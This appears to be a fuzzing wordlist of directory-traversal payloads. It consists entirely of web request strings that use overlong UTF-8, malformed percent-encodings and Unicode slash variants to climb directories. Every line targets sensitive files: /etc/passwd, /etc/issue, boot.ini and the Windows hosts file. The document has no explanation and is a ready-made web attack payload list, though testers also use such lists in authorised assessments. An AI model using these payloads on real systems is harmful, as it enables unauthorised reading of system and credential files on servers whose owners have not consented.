-%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfetc%c0%qfpasswd -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfetc%c0%qfissue -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfboot.ini -%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qf%f0%80%80%ae%f0%80%80%ae%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -%f0%80%80%ae%f0%80%80%ae%c1%8setc%c1%8spasswd -%f0%80%80%ae%f0%80%80%ae%c1%8setc%c1%8sissue -%f0%80%80%ae%f0%80%80%ae%c1%8sboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8setc%c1%8spasswd -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8setc%c1%8sissue -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8sboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8setc%c1%8spasswd -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8setc%c1%8sissue -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8sboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8setc%c1%8spasswd -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8setc%c1%8sissue -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8sboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8setc%c1%8spasswd -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8setc%c1%8sissue -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8sboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8setc%c1%8spasswd -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8setc%c1%8sissue -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8sboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8s%f0%80%80%ae%f0%80%80%ae%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -%f0%80%80%ae%f0%80%80%ae%c1%1cetc%c1%1cpasswd -%f0%80%80%ae%f0%80%80%ae%c1%1cetc%c1%1cissue -%f0%80%80%ae%f0%80%80%ae%c1%1cboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cetc%c1%1cpasswd -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cetc%c1%1cissue -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cetc%c1%1cpasswd -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cetc%c1%1cissue -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cetc%c1%1cpasswd -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cetc%c1%1cissue -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cetc%c1%1cpasswd -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cetc%c1%1cissue -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cetc%c1%1cpasswd -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cetc%c1%1cissue -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1c%f0%80%80%ae%f0%80%80%ae%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -%f0%80%80%ae%f0%80%80%ae%c1%afetc%c1%afpasswd -%f0%80%80%ae%f0%80%80%ae%c1%afetc%c1%afissue -%f0%80%80%ae%f0%80%80%ae%c1%afboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afetc%c1%afpasswd -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afetc%c1%afissue -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afetc%c1%afpasswd -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afetc%c1%afissue -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afetc%c1%afpasswd -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afetc%c1%afissue -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afetc%c1%afpasswd -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afetc%c1%afissue -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afetc%c1%afpasswd -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afetc%c1%afissue -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afboot.ini -%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%af%f0%80%80%ae%f0%80%80%ae%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -%f0%80%80%ae%f0%80%80%ae%bg%qfetc%bg%qfpasswd -%f0%80%80%ae%f0%80%80%ae%bg%qfetc%bg%qfissue -%f0%80%80%ae%f0%80%80%ae%bg%qfboot.ini -%f0%80%80%ae%f0%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfetc%bg%qfpasswd -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfetc%bg%qfissue -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfboot.ini -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfetc%bg%qfpasswd -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfetc%bg%qfissue -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfboot.ini -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfetc%bg%qfpasswd -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfetc%bg%qfissue -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfboot.ini -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfetc%bg%qfpasswd -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfetc%bg%qfissue -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfboot.ini -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfetc%bg%qfpasswd -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfetc%bg%qfissue -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfboot.ini -%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qf%f0%80%80%ae%f0%80%80%ae%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215passwd -%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215issue -%f0%80%80%ae%f0%80%80%ae%u2215boot.ini -%f0%80%80%ae%f0%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215passwd -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215issue -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215boot.ini -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215passwd -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215issue -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215boot.ini -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215passwd -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215issue -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215boot.ini -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215passwd -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215issue -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215boot.ini -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215passwd -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215etc%u2215issue -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215boot.ini -%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215%f0%80%80%ae%f0%80%80%ae%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -%f0%80%80%ae%f0%80%80%ae%u2216etc%u2216passwd -%f0%80%80%ae%f0%80%80%ae%u2216etc%u2216issue -%f0%80%80%ae%f0%80%80%ae%u2216boot.ini -%f0%80%80%ae%f0%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216etc%u2216passwd -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216etc%u2216issue -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216boot.ini -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216etc%u2216passwd -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216etc%u2216issue -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216boot.ini -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216etc%u2216passwd -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216etc%u2216issue -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216boot.ini -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216windows%u2216system32%u2216drivers%u2216etc%u2216hosts -%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216%f0%80%80%ae%f0%80%80%ae%u2216etc%u2216passwd 